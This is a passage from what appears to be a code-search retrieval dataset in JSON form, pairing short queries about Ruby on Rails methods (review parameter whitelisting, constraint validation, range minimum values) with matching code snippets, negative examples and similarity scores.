"def destroy\n @shop_review.destroy\n respond_to do |format|\n format.html { redirect_to shop_reviews_url, notice: '가게 리뷰가 삭제되었습니다.' }\n format.json { head :no_content }\n end\n end",
"def destroy\n review = Review.find(params[:id])\n if session[:companion_id] == review.companion_id \n review.destroy\n flash[:notice] = \"Review deleted\"\n redirect_to :back\n else\n flash[:notice] = \"This review belongs to another companion\"\n redirect_to :back\n end\n end",
"def destroy\n @review_template.destroy\n respond_to do |format|\n format.html { redirect_to review_templates_url }\n format.json { head :no_content }\n end\n end",
"def destroy\n @bizowners_review.destroy\n respond_to do |format|\n format.html { redirect_to bizowners_reviews_url, notice: 'Bizowners review was successfully destroyed.' }\n format.json { head :no_content }\n end\n end",
"def destroy\n @thesis_review = ThesisReview.find(params[:id])\n @thesis_review.destroy\n\n respond_to do |format|\n format.html { redirect_to(thesis_reviews_url) }\n format.xml { head :ok }\n end\n end"
] |
[
"0.8825942",
"0.8384066",
"0.83834416",
"0.83834416",
"0.83834416",
"0.8317577",
"0.8287302",
"0.8250263",
"0.8074591",
"0.8063523",
"0.8035887",
"0.7986956",
"0.79630625",
"0.7929023",
"0.79009676",
"0.7885112",
"0.7885112",
"0.78683513",
"0.7867553",
"0.7865634",
"0.7836517",
"0.78259534",
"0.7815818",
"0.781515",
"0.7807689",
"0.7807689",
"0.7807689",
"0.7807689",
"0.7807689",
"0.7807689",
"0.7807689",
"0.7807689",
"0.7791554",
"0.778671",
"0.77837086",
"0.77837086",
"0.77837086",
"0.77837086",
"0.77837086",
"0.7770706",
"0.7770706",
"0.7770706",
"0.7766593",
"0.77582324",
"0.7748757",
"0.7742514",
"0.7741067",
"0.7708848",
"0.7699243",
"0.7696409",
"0.76946044",
"0.76929766",
"0.76857704",
"0.76784056",
"0.76587087",
"0.76579046",
"0.7648974",
"0.7639552",
"0.7621031",
"0.761884",
"0.7595258",
"0.75898767",
"0.75856936",
"0.7585108",
"0.7580692",
"0.7572697",
"0.7568784",
"0.7568715",
"0.7563558",
"0.7549886",
"0.7542456",
"0.7541992",
"0.75386775",
"0.7538543",
"0.75352013",
"0.75254506",
"0.75199807",
"0.7516924",
"0.7516363",
"0.7515274",
"0.7512383",
"0.7507601",
"0.74858373",
"0.7462543",
"0.7452073",
"0.7434259",
"0.7398263",
"0.7398244",
"0.7382996",
"0.73742527",
"0.7373981",
"0.7373173",
"0.73660254",
"0.7344239",
"0.73280823",
"0.7327274",
"0.73138916",
"0.73120564",
"0.7304773",
"0.7296245"
] |
0.81108975
|
8
|
review_params lists all the permitted parameters for review table
|
def review_params
params.require(:review).permit(:name, :priority, :comment)
end
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def review_params\n parm = params.fetch(:review, {}).permit!\n p 'params', parm\n parm\n end",
"def review_params\n # params.require(:review).permit(:membership_id, :user_id, :rating, :comments, :lti_app_id)\n end",
"def review_params\n params.permit(:review, :body, :title, :reviewable_id, :reviewable_type)\n end",
"def review_params\n\t\t\tparams.require(:review).permit(:comment, :rating)\n\t\tend",
"def review_params\n params.require(:review).permit(:title, :description, :overall_rating, :replayability, :first_time_difficulty, :user_id, :boardgame_id)\n end",
"def review_params\n params.require(:review).permit(:rating, :description, :professor_id, :course_id)\n end",
"def review_params\n params.require(:review).permit(:user_id, :comic_id, :review_text, :review_title, :netabare, :tag_list, :star)\n end",
"def review_params\n params.require(:review).permit(:overall_rating, :supervisor_rating, :time_commitment, :expected, :work_description, :anonymous, :reflection, :supervisor_id, :student_id) \n end",
"def review_params\n\t\tparams.require(:review).permit(:heading, :review, :book_id, :user_id, :status, :cover_page)\n\tend",
"def review_params\n params.require(:review).permit(\n :overall_rating,\n :letter_grade,\n :semester,\n :year,\n :course_required,\n :interesting,\n :difficult,\n :standardized_course,\n :course_other_thoughts,\n :used_textbook,\n :attendance_mandatory,\n :course_format,\n :cared_about_material,\n :open_to_questions,\n :cared_about_students,\n :clear_grading,\n :homework_heavy,\n :clear_explanations,\n :fast_grading,\n :professor_other_thoughts,\n :professor_id,\n :course_id\n )\n end",
"def review_params\n params.require(:review).permit(:property_id, :body, :title, :property_rating, :created_at, :updated_at, :landlord_rating, :landlord_comments, :duration, :is_anonymous, :is_current_tenant)\n end",
"def review_params\n params.require(:review).permit(:product_id, :user_id, :description, :rating)\n end",
"def review_params\n params.require(:review).permit(:product_id, :user_id, :description, :rating)\n end",
"def review_params\n params.require(:review).permit(:product_id, :user_id, :description, :rating)\n end",
"def critic_review_params\n params[:critic_review]\n end",
"def review_params\n params.require(:review).permit(:product_image, :email, :location_id, :comment, :reviewer_image, :visibility, :product_name, :first_name, :last_name)\n end",
"def review_params\n params.fetch(:comment_review, {}).permit(:id,:comment_id,:review_text,:admin_id)\n end",
"def review_params\n params.require(:review).permit(:debt_placement_id, :review_level, :service_level, :aggresive_level, :speed_level, :description)\n end",
"def review_params\n params.require(:review).permit(:rating, :review_text, :book_id, :user_id)\n end",
"def review_params\n params.require(:review).permit(:reviewer, :reviewee, :skill_id, :stars, :body)\n end",
"def visitor_review_params\n params.fetch(:visitor_review, {})\n end",
"def reviews_and_rating_params\n params.fetch(:reviews_and_rating, {})\n end",
"def review_params\n params.require(:review).permit( :description, :rating)\n end",
"def review_params\n params.require(:review).permit(:title, :body, :user_id, :movie_id, :rating)\n end",
"def review_params\n params.require(:review).permit(:lecture_id, :user_id, :content, :rating)\n end",
"def review_params\n params.require(:review).permit(:comment, :rating, :book_id, :user_id)\n end",
"def review_params\n params.require(:review).permit(:title, :published, :author, :category_id, :score, :content, :portrait)\n end",
"def review_params\n params.require(:review).permit(:name, :comment, :rating, :product_id)\n end",
"def review_params\n params.require(:review).permit(:rating, :comment)\n end",
"def review_params\n params.require(:review).permit(:rating, :comment)\n end",
"def review_params\n params.require(:review).permit(:score, :confidence, :comments, :paper_id)\n end",
"def review_params\n params.require(:review).permit(:rating, :comment)\n end",
"def review_params\n params.require(:review).permit(:rating, :comment, :site_id)\n end",
"def review_params\n params.require(:review).permit(:author, :author_id, :top, :body, :rating, :user_id, :employer, :title)\n end",
"def review_params\n params.require(:review).permit(:rating, :review_content, :date_time)\n end",
"def review_params\n params.require(:review).permit(:first_name, :last_name, :product_name, :image_url, :location, :feedback, :stars, :category_id)\n end",
"def review_params\n params.require(:review).permit(:user_id, :target, :rating, :review)\n end",
"def admin_review_params\n params.fetch(:review, {}).permit(whitelisted_params)\n end",
"def review_params\n params.require(:review).permit(:author, :content, :rating, :user_id)\n end",
"def review_params\n params.require(:review).permit(:yelp_business_id, :yelp_user_id, :content, :stars)\n end",
"def review_params\n params.require(:review).permit(:customer_id, :car_id, :reservation_id, :content, :rating)\n end",
"def review_params\n params.require(:review).permit(:reviewer, :body)\n end",
"def review_params\n params.require(:review).permit(:menu, :comment, :image)\n end",
"def review_params\n params.require(:review).permit( :comment, :attraction_id)\n end",
"def review_params\n params.require(:review).permit(:description, :rating, :restaurant_id)\n end",
"def review_params\n params.require(:review).permit(:title, :description, :score, :course_id)\n end",
"def review_params\n params.permit(:reviewer, :comment, :rating, :restaurant_id)\n end",
"def review_params\n params.require(:review).permit(:content, :rating)\n end",
"def user_review_params\n params.require(:user_review).permit(:review_item_id, :user_id, :rated_by_user_id, :notes_allowed, :rate_period, :rating, :is_team, :pros, :cons, :notes, :is_archived, :checked, :multiplier, :team_id, review_notes_attributes: [:user_review_id, :general_notes, :pros, :cons] )\n end",
"def review_params\n params[:review].permit(:title, :content)\n end",
"def review_params\n params.require(:review).permit(:name, :description, :body, :year, :date, :place, :img, :artist_id, :category_id, :author_id, :fav1, :fav2, :fav3)\n end",
"def review_params\n params.require(:department_review).permit(:id, :title, :description, :score, :city_id, :user_id, :scorable_id, :scorable_type, :love_list, :improve_list, :image)\n end",
"def review_params\n\n params_new = params.require(:review).permit(:rating, :comments)\n params_new[:customer_id] = session[:customer_id]\n @bookings = Booking.find(params[:id])\n params_new[:listing_id] = @bookings.listing_id\n params_new[:anonymous] = params[:anonymous]\n params_new\n end",
"def review_params\n params.fetch(:review, {}).permit(:rating, :body, :restaurant_id, :timestamp)\n end",
"def review_params\n params.require(:review).permit(:user_id, :shop_id, :order_id, :content, :score)\n end",
"def review_params\n params.require(:review).permit(:rating, :content)\n end",
"def review_params\n params.require(:review).permit(:game_id, :user_id, :score, :content)\n end",
"def review_params\n params.require(:review).permit(:comment)\n end",
"def review_params\n params.require(:review).permit(:comment)\n end",
"def review_params\n params.require(:review).permit(:rating, :comment)\n end",
"def review_params\n params.require(:review).permit(:title, :body, :rating, :brewery)\n end",
"def review_params\n params.require(:review).permit(:name, :email, :content, :score, :subscription_id, :user_id)\n end",
"def review_params\n params.require(:review).permit(:description, :rating)\n end",
"def review_params\n params.require(:review).permit(:comment, :title, :rating,\n :parking_space_id, :owner_name)\n end",
"def review_params\n params.require(:review).permit(:comment, :rating, :user_id)\n end",
"def permited_params\n params.require(:review).permit(:title, :detail, :rating)\n end",
"def review_params\n params.require(:review).permit(:workstation_id, :monitor1, :monitor2, :monitor3, :hardware, :graphic_card_id, :os_distro_id, :remarks)\n end",
"def review_params\n params.require(:review).permit(:rating, :description)\n end",
"def review_params\nparams.require(:review).permit(:rating, :comment)\n\tend",
"def review_params\n params.require(:review).permit(:place_id, :content, :score)\n end",
"def review_params\n params.require(:review).permit(:title, :poster, :date, :article)\n end",
"def review_params\n params.require(:review).permit(:name, :email, :title, :body)\n end",
"def review_params\n params.require(:review).permit(:content,:user_id,:entry_id,:rating)\n end",
"def review_params\n params.require(:review).permit(:title, :author, :rating, :user_id)\n end",
"def review_params\n params.require(:review).permit(:r_title, :r_content, :grade ,:user_id, :hospital_id)\n end",
"def review_params\n params.require(:review).permit(:user_id, :service_id, :text)\n end",
"def review_params\n params.require(:review).permit(:title, :body, :score, :hotel_id, :user_id)\n end",
"def product_review_params\n params.require(:product_review).permit(:author, :comment, :rating, :product_id)\n end",
"def reviews_params\n params.require(:review).permit(:name, :email, :content, :score)\n end",
"def movie_review_params\n params.require(:movie_review).permit(:comment, :reviewer, :movie_id)\n end",
"def boo_k_review_params\n params.require(:boo_k_review).permit(:user_id, :book_id, :review)\n end",
"def review_params\n params.permit(:appointment_id, :talent_id)\n params.require(:review).permit(:mark, :comment)\n end",
"def review_params\n params.require(:review).permit(:body)\n end",
"def review_params\n params.require(:review).permit(:title, :taste_eval,:price_eval,:service_eval,:contents, :restaurant_id,:image_path)\n end",
"def restaurant_review_params\n params.require(:restaurant_review).permit(:reviewer_name, :rating, :comment, :restaurant_id)\n end",
"def review_params\n params.require(:review).permit(:content, :rating)\n end",
"def employee_review_params\n params.require(:employee_review).permit(:user, :review, :rating)\n end",
"def item_review_params\n params.require(:item_review).permit(:restaurant_id, :user_id, :item_id, :review, :rating, :date)\n end",
"def facility_review_params\n params.require(:facility_review).permit(:reviewer, :facility, :title, :description, :rating)\n end",
"def reviewing_params\n params.require(:reviewing).permit(:book_id, :rate, :review)\n end",
"def auditreview_params\n #params.fetch(:auditreview, {})\n params.require(:auditreview).permit(:tenant_id, :date, :correct, :incorrect, :mealtime, :category, :rating)\n end",
"def review_params\n params.require(:review).permit(:content)\n end",
"def pre_training_review_params\n params.require(:pre_training_review).permit(:rpl, :credit_transfer, :area_of_work, :employment, :pathway, :preferred_learning_style, :delivery_mode, :special_condition, :toc, :user_id)\n end",
"def tour_review_params\n params.require(:tour_review).permit(:user_id, :tour_id, :review)\n end",
"def correction_review_params\n params.require(:correction_review).permit(:reviewer_id_id, :correction_id, :assignment_schedule_id, :score_delta, :student_comment, :reviewer_comment)\n end",
"def event_review_params\n params.require(:event_review).permit(:review, :user_id, :event_id)\n end",
"def bookreview_params\n params.require(:bookreview).permit(:rating, :summary, :details, :book_id)\n end",
"def review_params\n params.require(:review).permit(:title, :body, :book_id)\n end",
"def review_params\n params.permit(:body, :city, :country, :user_name, :rating)\n end",
"def hm_review_params\n params.require(:hm_review).permit(:hm_name, :hm_creator, :hm_comment, :hm_point, :created_at, :updated_at)\n end"
] |
[
"0.84528714",
"0.7881275",
"0.7713893",
"0.7698338",
"0.7690936",
"0.7651478",
"0.7588309",
"0.757079",
"0.75666517",
"0.75534165",
"0.7545849",
"0.75402623",
"0.75402623",
"0.75402623",
"0.7513782",
"0.74998313",
"0.7499796",
"0.7496023",
"0.74620646",
"0.7461283",
"0.745369",
"0.74453694",
"0.74376005",
"0.7437249",
"0.7433492",
"0.74278486",
"0.7427361",
"0.74235296",
"0.7423048",
"0.7423048",
"0.7407763",
"0.7403834",
"0.73898387",
"0.7358056",
"0.7335495",
"0.73305166",
"0.7312721",
"0.73068035",
"0.73051816",
"0.7296472",
"0.7290001",
"0.72889525",
"0.72763413",
"0.7257099",
"0.7255987",
"0.7255803",
"0.72468156",
"0.723076",
"0.7227118",
"0.721818",
"0.7208641",
"0.7198774",
"0.7197494",
"0.7197222",
"0.71951324",
"0.7194026",
"0.71753997",
"0.7161622",
"0.7161622",
"0.7158953",
"0.71588564",
"0.7150867",
"0.71505594",
"0.71421635",
"0.71323967",
"0.71196383",
"0.7118672",
"0.7100986",
"0.7089823",
"0.7089729",
"0.7087785",
"0.70851505",
"0.7082389",
"0.7075126",
"0.7073826",
"0.7057396",
"0.70375454",
"0.7032473",
"0.70295596",
"0.70288265",
"0.70192915",
"0.7013535",
"0.7012168",
"0.6995024",
"0.6983851",
"0.6976103",
"0.69183",
"0.6905184",
"0.6904534",
"0.6899706",
"0.6888054",
"0.68824387",
"0.68801653",
"0.68794614",
"0.6855281",
"0.6817094",
"0.6813105",
"0.67794627",
"0.677887",
"0.6768712"
] |
0.7401983
|
32
|
Validate the constraint with the given name, which should have been added previously with NOT VALID.
|
def validate_constraint(name)
@operations << {:op => :validate_constraint, :name => name}
end
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def validate_constraint(table, name)\n current_instructions << Instructions::ValidateConstraint.new(\n table: table,\n name: name,\n )\n end",
"def validator_defined_for?(constraint_name)\n !!validator_for(constraint_name)\n end",
"def name_invalid\n errors.add(:name, :unknown)\n end",
"def name_is_valid\n errors.add(:name,'Invalid empty string for name.') unless name_is_valid?\n end",
"def name_is_valid\n errors.add(:name,\"Invalid string for name.\") unless name_is_valid?\n end",
"def not_reserved\n errors.add(:name, 'is reserved') if self.name.downcase.in?(self.class.reserved_names)\n end",
"def validate_name\n unless name.length > 0\n add_error :name, 'name of the price item shall be provided'\n end\n\n unless price.to_i > 0\n add_error :price, 'price should be a number'\n end\n end",
"def validator_for(constraint_name)\n validator_name_for(constraint_name).safe_constantize\n end",
"def name_not_blank\n if self.name.blank?\n self.errors.add(:name, I18n.t('stage.errors.blank_name'))\n end\n end",
"def supports_validate_constraints?\n false\n end",
"def supports_validate_constraints?\n false\n end",
"def constraint_by_name(name)\n self[name]\n end",
"def valid_name!(name)\n not_empty!(name)\n unless [String, Symbol].include?(name.class)\n coercion_error!\n end\n name\n end",
"def name_unique_in_clinic\n errors.add(:name, \"Name: #{name} already in use\") unless\n name_unique_in_clinic?\n end",
"def validators_on(name)\n ::Kernel.raise Errors::NotImplemented\n end",
"def validate_exclusion_of(attr); end",
"def name_can_not_be_greg\n if self && self.name.downcase == \"greg\"\n self.errors.add(:name, \"Can not be Greg\")\n end \n end",
"def param_for_validation?(name)\n if respond_to?(name)\n !send(name).nil?\n else\n !param_before_type_cast(name).nil?\n end\n end",
"def account_name_cannot_be_in_use\n if Account.find_by_name(account_name)\n errors.add(:account_name, \"Sorry, this name is already in use\")\n end\n end",
"def validator_name_for(constraint_name)\n \"#{self.name}::#{constraint_name.to_s.camelize}Validator\"\n end",
"def name_valid(name)\n if !name.empty?\n self.name = name\n return true\n end\n end",
"def validated?(name)\n true\n end",
"def valid?\n !name.nil?\n end",
"def valid?\n !name.nil?\n end",
"def valid?\n !name.nil?\n end",
"def validate_name\n\t\t\tunless Nacreon::NameRX.match(name)\n\t\t\t\terrors.add(:name,\n\t\t\t\t\t'must contain only letters, numbers, and \"-\".')\n\t\t\tend\n\t\tend",
"def required?(name); end",
"def test_should_require_name\n intitution = create(:name => nil)\n assert intitution.errors.invalid?(:name), \":name should be required\"\n assert_invalid intitution, \"intitution shouldn't be created\"\n end",
"def clean(_name)\n @rules.delete(_name)\n end",
"def validate()\n errors.add(:nombre, \"debe ser positivo\") if nombre.nil?\n end",
"def validateName(name)\n if (name == nil)\n return false\n end\n \n return true # TODO This is wrong. Finish this function.\nend",
"def call_to(name)\n @validators.delete(name.to_s)\n end",
"def name_valid(name)\n if !name.empty?\n self.name = name\n return true\n else\n return false\n end\n end",
"def name_is_unique\n return if self.name.nil?\n errors.add(:name, 'has already been taken') if Institution.where(name: self.name).reject{|r| r == self}.any?\n end",
"def _validate_name(name)\n if name =~ %r{/}\n results.add_error('name', 'The name of a spec should not contain ' \\\n 'a slash.')\n end\n\n if name =~ /\\s/\n results.add_error('name', 'The name of a spec should not contain ' \\\n 'whitespace.')\n end\n\n if name[0, 1] == '.'\n results.add_error('name', 'The name of a spec should not begin' \\\n ' with a period.')\n end\n end",
"def incompatible_constraint(attribute_names, options = {}, &block)\n constraint = IncompatibleConstraint.new(self, attribute_names, options, &block)\n attribute_names.collect { |a| attribute_by_name(a) }.each do |a|\n error(\"Incompatible constraint #{constraint.name} on #{self.name} has an illegal non nullable attribute\") if !a.nullable?\n end\n add_unique_to_set(\"incompatible\", constraint, @incompatible_constraints)\n end",
"def drop_constraint(table, name)\n current_instructions << Instructions::DropConstraint.new(\n table: table,\n name: name,\n )\n end",
"def add_validation(name, validation)\n validations_by_name[name] = validation\n end",
"def name_is_valid?\n return false unless not_nil_and_string(self.name)\n return self.name.length > 0\n end",
"def name_is_valid?\n return false unless not_nil_and_string(self.name)\n return self.name.length > 0\n end",
"def validates_presence_of_final_calculation_prerequisite(name)\n return unless validators_on(name).empty?\n validates_presence_of name\n end",
"def check_tag_format\n errors.add(:name, 'is not a valid tag') unless name =~ Tag.validation_regex\n end",
"def validate_attributes!(attributes)\n return missing_required unless attributes.key?(:name)\n return missing_required unless defined_value?(attributes[:name])\n\n true\n end",
"def name_must_be_unique_if_organization\n unless type == \"Individual\"\n self.errors.add(:name, :is_already_taken) if Entity.where('lower(name) = ?', name.downcase).any?\n end\n end",
"def assert_valid\n raise ValidationError, \"no name\" unless name\n raise ValidationError, \"no version\" unless version\n raise ValidationError, \"no summary\" unless summary\n #raise ValidationError, \"no maintainer\" unless maintainer\n #raise ValidationError, \"no homepage\" unless homepage\n end",
"def test_should_require_name\n ng = NodeGroup.create(:name => nil)\n assert ng.errors.on(:name)\n end",
"def company_account_name_unique\n errors.add(:name, 'already exists') if name && account_name_exists?\n end",
"def validate_domain(name)\n jid = Blather::JID.new(name)\n raise \"incorrect domain: #{name}\" if jid.node || jid.resource\n end",
"def validate_domain(name)\n jid = JID.new(name)\n raise \"incorrect domain: #{name}\" if jid.node || jid.resource\n end",
"def validate_domain(name)\n jid = JID.new(name)\n raise \"incorrect domain: #{name}\" if jid.node || jid.resource\n end",
"def validate_name_is_unique_among_materials\n return if parent.nil?\n\n # conflicts = parent.materials.where.has { |parent| name =~ parent.name }\n conflicts = parent.materials.where(Course::Material.arel_table[:name].matches(name))\n errors.add(:name, :taken) unless conflicts.empty?\n end",
"def add_exclusion_constraint(vectors, options = {})\n subset = @variable_set.create_subset(vectors)\n if !subset.empty?\n constraint_hash = {\n :vars => subset.to_lp_vars,\n :operator => '=',\n :target => 0\n }\n constraint_hash[:name] = options[:name] if options.has_key?(:name)\n @constraints << Constraint.new(constraint_hash)\n end\n end",
"def required_attribute(name, options={:level=>:error})\n\t\t\t\tvalidate(\"Macro '#{@name}' requires a '#{name}' attribute\", options) do\n\t\t\t\t\t!raw_attribute(name.to_sym).blank?\n\t\t\t\tend\n\t\t\tend",
"def supports_check_constraints?\n false\n end",
"def validate\n raise \"A name for the collection is required.\" unless @attributes[:name]\n raise \"A source for the collection is required (created_by_id).\" unless @attributes[:created_by_id]\n end",
"def validate\n super\n rescue Sudoku::Constraint::ConstraintError => e\n raise ConstraintError, e.message + \" in a column\"\n end",
"def update_attribute_with_validation_skipping(name, value)\n send(name.to_s + '=', value)\n save(false)\n end",
"def constraints(_)\n nil\n end",
"def constraint_regexp_for( name )\n\t\tself.log.debug \" searching for a constraint for %p\" % [ name ]\n\n\t\t# Fetch the constraint's regexp\n\t\tconstraint = self.constraints[ name.to_sym ] or\n\t\t\traise NameError, \"no such parameter %p\" % [ name ]\n\t\traise ScriptError,\n\t\t\t\"can't route on a parameter with a %p\" % [ constraint.class ] unless\n\t\t\tconstraint.respond_to?( :pattern )\n\n\t\tre = constraint.pattern\n\t\tself.log.debug \" bounded constraint is: %p\" % [ re ]\n\n\t\t# Unbind the pattern from beginning or end of line.\n\t\t# :TODO: This is pretty ugly. Find a better way of modifying the regex.\n\t\tre_str = re.to_s.\n\t\t\tsub( %r{\\(\\?[\\-mix]+:(.*)\\)}, '\\1' ).\n\t\t\tgsub( PARAMETER_PATTERN_STRIP_RE, '' )\n\t\tself.log.debug \" stripped constraint pattern down to: %p\" % [ re_str ]\n\n\t\treturn Regexp.new( \"(?<#{name}>#{re_str})\", re.options )\n\tend",
"def supports_exclusion_constraints?\n false\n end",
"def valid_scope_name?(name)\n if scopes[name] || respond_to?(name, true)\n if Mongoid.scope_overwrite_exception\n raise Errors::ScopeOverwrite.new(self.name,name)\n else\n if Mongoid.logger\n Mongoid.logger.warn(\n \"Creating scope :#{name}. \" +\n \"Overwriting existing method #{self.name}.#{name}.\"\n )\n end\n end\n end\n end",
"def _sanity_check(schema)\n raise SchemaInternalError, \"No name provided on #{self}\" if name.nil?\n super(schema)\n end",
"def depends(name, constraint = \">= 0\")\n if name.nil?\n raise ArgumentError, \"A name must be specified. You gave: #{args}.\"\n end\n\n dependency = Dependency.new(self, name, constraint)\n add_dependency(dependency)\n\n self\n end",
"def override( name, *args, &block )\n\t\tname = name.to_sym\n\t\traise ArgumentError,\n\t\t\t\"no parameter %p defined; perhaps you meant to use #add?\" % [ name.to_s ] unless\n\t\t\tself.constraints.key?( name )\n\n\t\tself.log.debug \"Overriding parameter %p\" % [ name ]\n\t\tself.constraints[ name ] = Constraint.for( name, *args, &block )\n\n\t\tself.validated = false\n\tend",
"def allow?(name) \n return return_symbol if name_matchers.reject{|name_matcher| !name.match(name_matcher) } \n end",
"def invalid_param_errors\n\t\treturn self.invalid.collect do |field, _|\n\t\t\tconstraint = self.constraints[ field.to_sym ] or\n\t\t\t\traise NameError, \"no such field %p!\" % [ field ]\n\t\t\t\"Invalid value for '%s'\" % [ constraint.description ]\n\t\tend\n\tend",
"def invalid?\n good_ones = ['Ready','Submittable','Completed','Resubmittable','InProgress']\n return !good_ones.include?(name)\n end",
"def name_present\n if name.blank?\n errors.add(:name, \"Can't be empty\")\n end\n end",
"def add( name, *args, &block )\n\t\tname = name.to_sym\n\t\tconstraint = Constraint.for( name, *args, &block )\n\n\t\t# No-op if there's already a parameter with the same name and constraint\n\t\tif self.constraints.key?( name )\n\t\t\treturn if self.constraints[ name ] == constraint\n\t\t\traise ArgumentError,\n\t\t\t\t\"parameter %p is already defined as %s; perhaps you meant to use #override?\" %\n\t\t\t\t\t[ name.to_s, self.constraints[name] ]\n\t\tend\n\n\t\tself.log.debug \"Adding parameter %p: %p\" % [ name, constraint ]\n\t\tself.constraints[ name ] = constraint\n\n\t\tself.validated = false\n\tend",
"def empty_name_error(type, what)\n validation_error(type, what, 'name is empty')\n end",
"def validate_name(name)\n !name.scan(/\\D/).empty?\n end",
"def supports_external_drop_constraints?() false; end",
"def skip_validations\n true\n end",
"def your_name_is_not_dumb\n if name.include?(\"dumb\")\n errors.add(:name, \"is dumb\")\n end\n end",
"def sv_not_synonym_of_self\n if list_of_invalid_taxon_names.include?(self)\n soft_validations.add(:base, \"Taxon has two conflicting relationships (invalidating and validating). To resolve a conflict, add a status 'Valid' to a valid taxon.\")\n end\n end",
"def check_transaction_name( name )\n # No-op -- apparently absolutely anything is a valid transaction name?\n # This is here for when that inevitably comes back to haunt us.\n end",
"def validate_network_name!(network_name, env)\n if !env[:machine].provider.driver.existing_named_network?(network_name)\n raise Errors::NetworkNameUndefined,\n network_name: network_name\n end\n true\n end",
"def validate_name(name)\n return if name =~ /\\A[a-z0-9]+[-\\/][a-z][a-z0-9_]*\\Z/i\n\n namespace, modname = name.split(/[-\\/]/, 2)\n modname = :namespace_missing if namespace == ''\n\n err = case modname\n when nil, '', :namespace_missing\n \"the field must be a namespaced module name\"\n when /[^a-z0-9_]/i\n \"the module name contains non-alphanumeric (or underscore) characters\"\n when /^[^a-z]/i\n \"the module name must begin with a letter\"\n else\n \"the namespace contains non-alphanumeric characters\"\n end\n\n raise ArgumentError, \"Invalid 'name' field in metadata.json: #{err}\"\n end",
"def supports_external_drop_constraints?() true; end",
"def skip_validation_for(*args)\n args.each { |attr| send(\"skip_#{attr}_validation=\", true) }\n end",
"def should_be_wrong_duplicated_name(wrong_song = @wrong_song)\n validate_column_errors(wrong_song, :name, false, 'activerecord.errors.messages.taken')\n end",
"def validate_name\n if third_party && name.blank?\n errors.add(\n :name,\n :blank,\n )\n end\n end",
"def validate(method_name)\n validations << method_name\n end",
"def validates_duplicity_of(attr_name, scope: nil)\n set_callback :save, :before, Callback.new(attr_name, scope)\n end",
"def cannot_have_conflicts\n \terrors.add(:base, \"Conflicts with another reservation\") if self.has_conflicts?\n end",
"def validate_impossible_changes\n if @slide\n errors.add(:lesson_id, :cant_be_changed) if @slide.lesson_id != self.lesson_id\n errors.add(:kind, :cant_be_changed) if @slide.kind != self.kind\n errors.add(:title, :in_cover_it_cant_be_different_by_lessons_title) if @lesson && self.cover? && @slide.title != self.title && @lesson.title != self.title\n end\n end",
"def validate_relation(klass, name, options = {})\n [name, \"#{name}?\".to_sym, \"#{name}=\".to_sym].each do |n|\n if Mongoid.destructive_fields.include?(n)\n raise Errors::InvalidRelation.new(klass, n)\n end\n end\n end",
"def be_invalid_with(attribute, *values)\n BeInvalidWith.new(attribute, values)\n end",
"def validate_unique_name(name)\n if @@events.reduce(true) {|outcome, event| outcome && (event.name != name)}\n # Event name is unique.\n return name\n else\n handle_validation_fail \"That event name already exists!\"\n return false\n end\n end",
"def check_validity_of_scope\n errors.add(:name, \"is not a valid scope name\") unless Product.respond_to?(self.name.intern)\n apply_on(Product).limit(0) != nil\n rescue Exception => e\n unless Rails.env.production?\n\n puts \"name: #{self.name}\"\n puts \"arguments: #{self.arguments.inspect}\"\n puts e.message\n puts e.backtrace\n end\n errors.add(:arguments, \"are incorrect\")\n end",
"def validate_impossible_changes\n errors.add(:group_id, :cant_be_changed) if @mailing_list_address && @mailing_list_address.group_id != self.group_id\n end",
"def valid_name!\n return unless @name.blank?\n\n @success = false\n @error = 'Error: site name must be present'\n end",
"def validate_name\n if name.match(/\\|/)\n errors.add(:name, \"cannot have a '|' character\")\n end\n end",
"def require_validator(short_name)\n str_name = short_name.to_s\n validators.fetch(str_name) do\n Grape::Validations::Validators.const_get(\"#{str_name.camelize}Validator\")\n end\n rescue NameError\n raise Grape::Exceptions::UnknownValidator.new(short_name)\n end",
"def ensure_name_availability!(name)\n raise 'Name already in use' if kvm_exists?(name)\nend",
"def association_invalide\n @validations.keys.detect do |nom_association|\n !@validations[nom_association].call\n end\n end",
"def test_should_require_name_group\n group = create(:name => nil)\n assert group.errors.invalid?(:name), \":name should be required\"\n assert_invalid group, \"group shouldn't be created\"\n end",
"def unique_name\n return true unless company && name\n scope = company.time_periods.where('LOWER(name) = ?', self.name.downcase)\n scope = scope.where('id <> ?', self.id) if self.id\n\n errors.add(:name, \"with value #{name} has already been taken\") if scope.count > 0\n end",
"def validate\n needs :project unless skip_project_check?\n end",
"def preconditions\n validator.kind == :uniqueness\n end"
] |
[
"0.7206155",
"0.6627902",
"0.65585315",
"0.6364898",
"0.6355886",
"0.6327348",
"0.62545794",
"0.6238708",
"0.61284125",
"0.60058",
"0.60058",
"0.5994172",
"0.5992439",
"0.5991104",
"0.5974525",
"0.59616953",
"0.59547657",
"0.5903176",
"0.58597124",
"0.5849842",
"0.58259225",
"0.58173513",
"0.5791231",
"0.5791231",
"0.5791231",
"0.5787675",
"0.5771683",
"0.5747298",
"0.5715261",
"0.57091385",
"0.56890893",
"0.56813157",
"0.5675356",
"0.5663056",
"0.56399626",
"0.56140214",
"0.5610613",
"0.55731565",
"0.5557491",
"0.5557491",
"0.55436736",
"0.5493901",
"0.54853374",
"0.54709256",
"0.54678464",
"0.54576164",
"0.54547524",
"0.54505485",
"0.54422814",
"0.54422814",
"0.5408871",
"0.5404514",
"0.54030854",
"0.5392216",
"0.53610677",
"0.53496367",
"0.53374",
"0.5336137",
"0.5320154",
"0.5314097",
"0.5311139",
"0.5304028",
"0.52935874",
"0.5291031",
"0.5289493",
"0.52828765",
"0.52758276",
"0.52691513",
"0.52679724",
"0.526597",
"0.52554834",
"0.52517194",
"0.5245579",
"0.5242453",
"0.5238094",
"0.52378416",
"0.52352864",
"0.5214643",
"0.52121836",
"0.5196829",
"0.51962984",
"0.51955736",
"0.51950645",
"0.5192693",
"0.51908875",
"0.5182005",
"0.51746607",
"0.51732516",
"0.5171532",
"0.51711714",
"0.51687896",
"0.5163378",
"0.51627505",
"0.5161497",
"0.5147023",
"0.5134708",
"0.51332146",
"0.5123329",
"0.5116662",
"0.5116402"
] |
0.7885657
|
0
|
The minimum value of the data type used in range partitions, useful as an argument to from.
|
def minvalue
MINVALUE
end
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def min\r\n @range.min\r\n end",
"def min\n @range.begin\n end",
